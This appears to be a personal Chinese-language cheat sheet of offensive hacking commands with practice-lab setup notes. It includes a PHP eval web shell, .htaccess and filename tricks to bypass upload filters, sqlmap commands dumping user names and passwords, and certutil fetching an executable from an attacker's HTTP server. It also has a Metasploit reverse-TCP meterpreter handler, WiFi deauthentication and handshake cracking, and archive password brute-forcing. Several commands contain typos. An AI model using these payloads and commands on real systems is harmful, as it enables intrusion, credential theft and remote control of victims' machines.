hacker（hacker.exe）

--tables -D gaofei -T sys_user --columns -C "Name,Pwd" --dump

返回所有

-a

直连数据库

-d "mysql://root:password@192.168.0.1:3306/testdb" -f -banner --dbs --user

指定url探测

-u "http://" --banner

从文件中读取探测

-l 从burp日志中读取http请求日志文件

在设置->logging->代理勾选请求

python sqlmap.py -l test

Apifox

1.curp右键copyas curl

2.导入curl

哇哇工具

.htaccess

<FilesMatch "shell">

SetHandler application/x-httpd-php

</FilesMatch>

或

AddType application/x-httpd-php .jpg .txt

<?php @eval($_POST["yuer"]); echo "I am a horse."; ?>

php大小写绕过，可以上传Php尝试

php文件加. .

filename="1gggg.php::$DATA"

filename="1gggg.php.ppphphp"

https://github.com/smxiazi/xp_CAPTCHA

https://github.com/smxiazi/New_xp_CAPTCHA

http://burp 下载证书

cacer.der 电脑使用，如果在模拟器需要改后缀 cacer.cer

手机监听

https://www.bilibili.com/video/BV1sv4y1Q77h/?spm_id_from=333.337.search-card.all.click&vd_source=8caa12b6d4fb69220f707ec62983a250

HFS 文件服务器

kali 搜索msdn

sudo su

msfconsole

themida 加壳软件

www.linuxcool.com

kali 账号密码kaili 123456

kali

apt 命令

mousepad /etc/apt/sources.list

apt update

apt search ***

systemctl start ssh

apt install docker.io

systemstl start docker

docker镜像

hub.docker.com 阿里云搜索： 容器镜像服务 修改镜像地址，按照阿里云的文档操作

docker run -dit --name=dvwa -p 10000:80 xxx/dvwa

-dit为后台运行

进入应用的命令

docker exec -it dvwa bash

-it 确定哪个应用

apt install docker-compose 靶标集合

https://gitclone.com

vulhub

docker-compose up -d xxx -d是放在后台 搭建环境，如spring

docker ps -a

docker-compose down 关闭

docker rm -f dvwa

linux 运行文件 elf

苹果 macho

远控木马

python3 -m http.server 10000

证书工具 也可以下载

certutil -urlcache -split -f http://xxxx:10000/test.exe

msfconsole

use exploit.multi/handler

set paload windows/x64/meterpreter/revers_tcp

set lhost 192...

set lport 9999

run

百度 高级搜索

漏洞盒子

fuzz 暴力尝试

无线密码

网卡监听

1.airmon-ng start wlan0

扫描

2.airodump-ng wlan0

抓取握手包

3.airodump-ng -w ryan -c 6 --bssid ***mac wlan0

-c:信道

-w:存放位置

--bssid：指定mac

4.aireplay-ng -0 2 -a 路由器的mac -c 客户端的mac wlan0

5.破解握手包

aircrack-ng -w pass.txt ran-*.cap

winhex 查看16进制工具

C:\xampp\htdocs\test

C:\xampp\htdocs\pikachu-master\vul\unsafeupload\uploads

fcrackzip -D -p passwords.txt password2.zip

fcrackzip -b -c 'aA1!' -l 1-10 -u password2.zip 选择大小写且数字!-b代表brute-force；-l限制密码长度；-c指定使用的字符集：

fcrackzip -b -c '1' -l 6 -u password2.zip 数字破解

fcrackzip -D -p passwords.txt -u password2.zip

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u password2.zip

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u example.zip

rarcrack example.rar --threads 2 --type rar